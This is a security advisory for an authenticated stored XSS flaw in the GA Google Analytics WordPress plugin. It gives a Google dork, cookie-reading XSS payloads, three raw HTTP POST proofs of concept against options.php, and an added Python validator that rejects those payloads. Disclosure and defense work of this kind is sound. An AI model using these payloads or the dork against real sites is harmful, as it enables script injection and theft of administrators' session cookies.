/*!
- # VULNERABILITY: GA Google Analytics WordPress Plugin <= 20210211 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/ga-google-analytics/
- # DATE: 2021-04-04
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Jeff Starr [ https://plugin-planet.com ]
- # SOFTWARE VERSION: <= 20210211
- # SOFTWARE LINK: https://wordpress.org/plugins/ga-google-analytics/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: N/A
*/
### -- [ Info: ]
[i] An Authenticated Persistent XSS vulnerability was discovered in the GA Google Analytics plugin through v20210211 for WordPress.
[i] Vulnerable parameter(s): &gap_options[gap_id]=, &gap_options[tracker_object]=, &gap_options[gap_custom_code]=.
### -- [ Impact: ]
[~] Malicious JavaScript code injection and the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payloads: ]
[$] GA Tracking ID: 13"' ' m0ze=m0ze= onload=alert(document.cookie); //
[$] Custom Tracker Objects: '');alert(document.cookie);alert('m0ze'
[$] Custom Tracker Objects (Part #1): '\');alert(document.cookie);/* | Custom GA Code (Part #2): */;
### -- [ PoC #1 | Authenticated Persistent XSS | GA Tracking ID: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 459
Cookie: [admin cookies]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&gap_options%5Bgap_id%5D=13%22%27+%27+m0ze%3Dm0ze%3D+onload%3Dalert%28document.cookie%29%3B+%2F%2F&gap_options%5Bgap_enable%5D=2&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #2 | Authenticated Persistent XSS | Custom Tracker Objects: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%27%29%3Balert%28document.cookie%29%3Balert%28%27m0ze%27&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D=
### -- [ PoC #3 | Authenticated Persistent XSS | Custom Tracker Objects & Custom GA Code: ]
[!] POST /wp-admin/options.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 445
Cookie: [admin cookie]
option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%5C%27%29%3Balert%28document.cookie%29%3B%2F*&gap_options%5Bgap_custom_code%5D=*%2F%3B&gap_options%5Bgap_custom%5D=
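[i] An added example (not part of this advisory or of the plugin's code) of the validation a hardened settings handler could apply to the affected parameters, run against the PoC #1 and PoC #2 values: the Tracking ID is matched against a strict allowlist (the UA-/G- formats are an assumption about what a legitimate ID looks like) and the tracker object is accepted only as a JSON object literal (an assumption about the field's intended content). The Custom GA Code field is free-form by design, so it is not validated here and stays a capability that only trusted administrators should hold.

```python
import json
import re
from urllib.parse import parse_qs

# Allowlist for the GA Tracking ID field. Assumption: Universal Analytics
# (UA-xxxxxx-x) and GA4 measurement (G-xxxxxxxx) IDs are the only valid forms.
TRACKING_ID_RE = re.compile(r"^(UA-\d{4,10}-\d{1,4}|G-[A-Z0-9]{6,12})$")

def sanitize_tracker_object(raw: str):
    """Accept the tracker fields object only as a JSON object literal and
    re-serialise it so no free-form JavaScript can ride along (assumption:
    the field is meant to hold something like {"cookieDomain": "auto"}).
    Returns the canonical literal, "" for an empty field, or None if rejected."""
    if raw == "":
        return ""
    try:
        obj = json.loads(raw)
    except ValueError:
        return None
    if not isinstance(obj, dict):
        return None
    # Escape '<' so a string value cannot close the inline <script> element.
    return json.dumps(obj).replace("<", "\\u003c")

def check_gap_options(body: str) -> dict:
    """Return {parameter: reason} for every rejected value in a urlencoded
    options.php POST body; an empty dict means the update passes. The custom
    GA code field is free-form by design and is not validated here."""
    fields = parse_qs(body, keep_blank_values=True)
    findings = {}
    gap_id = fields.get("gap_options[gap_id]", [""])[0]
    if not TRACKING_ID_RE.fullmatch(gap_id):
        findings["gap_options[gap_id]"] = "not a GA tracking ID"
    tracker = fields.get("gap_options[tracker_object]", [""])[0]
    if sanitize_tracker_object(tracker) is None:
        findings["gap_options[tracker_object]"] = "not a JSON object literal"
    return findings

# Constructed bodies: the first two carry the advisory's PoC #1 and PoC #2
# values for the affected parameters, the third is a benign configuration.
POC1 = ("gap_options%5Bgap_id%5D=13%22%27+%27+m0ze%3Dm0ze%3D+onload%3Dalert"
        "%28document.cookie%29%3B+%2F%2F&gap_options%5Btracker_object%5D=")
POC2 = ("gap_options%5Bgap_id%5D=m0ze&gap_options%5Btracker_object%5D="
        "%27%27%29%3Balert%28document.cookie%29%3Balert%28%27m0ze%27")
BENIGN = ("gap_options%5Bgap_id%5D=UA-12345678-1&gap_options%5Btracker_object"
          "%5D=%7B%22cookieDomain%22%3A%22auto%22%7D")
if __name__ == "__main__":
    for label, body in (("PoC #1", POC1), ("PoC #2", POC2), ("benign", BENIGN)):
        print(label, check_gap_options(body) or "accepted")
```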
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze